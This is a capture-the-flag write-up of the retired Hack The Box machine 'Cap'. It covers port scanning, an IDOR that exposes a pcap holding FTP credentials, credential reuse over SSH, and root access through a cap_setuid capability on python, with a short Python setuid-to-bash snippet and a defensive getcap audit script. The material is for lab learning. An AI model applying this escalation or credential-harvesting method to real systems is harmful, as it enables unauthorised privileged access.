# Cap (HTB)

## Intro.

Hello everyone. Today I want to go through a retired Hack The Box machine, Cap. Let's get right into it.

***

## Enumeration.

### Port scanning.

```
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
|   256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open  http    syn-ack ttl 63 gunicorn
|_http-server-header: gunicorn
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-title: Security Dashboard
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Sun, 01 Dec 2024 00:59:24 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 01 Dec 2024 00:59:19 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 01 Dec 2024 00:59:19 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

* HTTP
* FTP
* SSH

### So let's start with FTP.

I tried to log in as anonymous but it did not work.

<figure><img src="/files/vlDu2wnGYqLMKTjqQ8oM" alt=""><figcaption></figcaption></figure>

So I believe there is nothing here.

### Enumerate HTTP.

Let's move to the web application.

<figure><img src="/files/RrvkKADGmYDx7RCOlMjf" alt=""><figcaption></figcaption></figure>

We have some links under the user but none of them work. On the left we have IP config and Network status, which show us the output of the *ipconfig* and *netstat* commands respectively. At first glance I thought maybe some sort of command injection, but no luck.

But we still have **Security**. When I opened it, it took some time to load, and when it opened there was nothing.

<figure><img src="/files/ZRp7YG9kEnQFvg7mWbPN" alt=""><figcaption></figcaption></figure>

I tried changing the number in the URL: I switched it to **zero** and found this.

<figure><img src="/files/ufC3oVu4m5aKbeD3LPFu" alt=""><figcaption></figcaption></figure>

Pressing the download button will download a **pcap** file.

We open the file with Wireshark and there we can find the FTP creds.

<figure><img src="/files/QbnQNe3FhJot8VpkR89F" alt=""><figcaption></figcaption></figure>

### Let's head back to FTP.

<figure><img src="/files/2xbm0Z7HCAMeLCVi2ICM" alt=""><figcaption></figcaption></figure>

After we get these files we can find our flag.

{% hint style="info" %}
To download a file from FTP to our machine, use the **get** command:

**get \<file name>**
{% endhint %}

## Shell as nathan.

The creds we have in fact allow us to log in via SSH.

<figure><img src="/files/Q7dKcUShbgnhHdfLFv5q" alt=""><figcaption></figcaption></figure>

## Getting Shell as Root.

Once I was on the machine I tried several ways, such as:

* suid
* path
* crons
* sudo allowed

None of them worked. Then I looked at the machine name, CAP. What can it be?\
You are correct: ***Capabilities***. So I checked them using the following command.

{% tabs %}
{% tab title="bash" %}

```bash
getcap -r / 2>/dev/null
```

{% endtab %}
{% endtabs %}

<figure><img src="/files/UiP6HpunS1BGbMxHuBKH" alt=""><figcaption></figcaption></figure>

Once I saw python I knew what I needed to do. We can see that the capability on python allows it to set the UID.

{% hint style="info" %}
Capabilities on files or executables allow you to grant an application some level of privilege without giving it full root access or SUID.
{% endhint %}

So now we need to use python to change our UID and get a shell.

{% tabs %}
{% tab title="Python" %}

```python
import os

# Our new UID, which is root's UID.
new_uid = 0
# Set the UID (allowed because the interpreter carries the setuid capability).
os.setuid(new_uid)
# Execute bash as root, since we changed our UID to root's.
os.system("/bin/bash -i")
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
Run the script using python3 \<file name>
{% endhint %}

Once we run this code we will get a root shell.

<figure><img src="/files/GTcTBiFhByugIU33HTDC" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5EwbT7lfVo5UapMQD2vm" alt=""><figcaption></figcaption></figure>
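From the defender's side, the same `getcap -r /` output can be audited automatically. The script below is an added example, not part of the original write-up: it parses getcap output in both the older (`path = caps+flags`) and newer (`path caps=flags`) formats and flags risky file capabilities. The sample lines, the `HIGH_RISK` list and the interpreter pattern are constructed assumptions.

```python
import re

# Assumption: capabilities treated here as root-equivalent or close to it.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
             "cap_sys_module", "cap_chown", "cap_fowner", "cap_setfcap"}
# Assumption: binaries that run arbitrary user-supplied code, so any
# high-risk capability on them is usable by whoever can execute them.
INTERPRETER = re.compile(r"/(python|perl|ruby|node|php|lua)[\d.]*$")
# Path, optional "=" separator (older libcap), then one or more clauses.
LINE = re.compile(r"^(?P<path>.+?)\s+(?:=\s+)?"
                  r"(?P<caps>(?:cap_[a-z_0-9,]+[+=][eip]+\s*)+)$")

# Constructed sample of `getcap -r / 2>/dev/null` output (both formats).
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/backup/tar cap_dac_read_search=ep
"""

def audit(getcap_output):
    """Return (severity, path, capability) for each risky file capability."""
    findings = []
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # not a getcap result line
        path = m.group("path")
        for clause in m.group("caps").split():
            names, flags = re.split(r"[+=]", clause)
            # Inheritable-only ("i") grants nothing by itself; the file
            # must put the capability in the permitted or effective set.
            if not set(flags) & {"e", "p"}:
                continue
            for cap in names.split(","):
                if cap in HIGH_RISK:
                    sev = "critical" if INTERPRETER.search(path) else "review"
                    findings.append((sev, path, cap))
    return findings

if __name__ == "__main__":
    for sev, path, cap in audit(SAMPLE):
        # `setcap -r <file>` removes all capabilities from the file.
        print(f"[{sev}] {path}: {cap} -> fix with: setcap -r {path}")
```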

## Conclusion.

In the end this machine was a piece of cake, and I enjoyed that piece for sure. It is a good machine that teaches you some level of working with Wireshark and how to exploit misconfigured capabilities.


